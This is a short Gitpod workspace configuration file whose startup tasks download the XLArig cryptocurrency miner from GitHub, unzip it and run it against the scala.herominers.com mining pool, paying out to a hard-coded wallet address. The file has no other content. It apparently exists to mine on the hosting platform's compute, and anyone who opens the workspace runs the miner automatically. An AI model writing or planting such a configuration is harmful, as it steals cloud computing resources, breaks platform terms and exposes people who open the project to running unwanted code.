image: gitpod/workspace-full
tasks:
  - command: wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip 
  - command: unzip XLArig-v5.2.2-linux-x86_64.zip 
  - command: ./xlarig -o scala.herominers.com:10131 -u Svjmd6RYMzgdJV3QsEVGLzZVanNungEZZWRZ1zF1EtNaQ55LxQVSUnzM47kRAdKGKHTRoZbJAcrbkVTYPp3724zq1EQoji6TD -p Santhosh -a panthera -k 